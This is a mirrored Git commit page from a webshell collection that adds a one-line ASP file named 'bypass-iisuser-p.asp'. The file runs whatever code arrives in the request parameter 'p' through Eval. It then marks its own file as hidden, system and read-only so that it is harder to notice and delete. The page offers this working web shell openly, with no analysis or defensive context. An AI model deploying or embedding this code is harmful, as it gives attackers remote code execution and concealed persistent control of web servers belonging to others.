mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
add a asp webshell
bypass iisuser
This commit is contained in:
1
asp/bypass-iisuser-p.asp
Normal file
1
asp/bypass-iisuser-p.asp
Normal file
@@ -0,0 +1 @@
|
||||
<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>
|
||||
Reference in New Issue
Block a user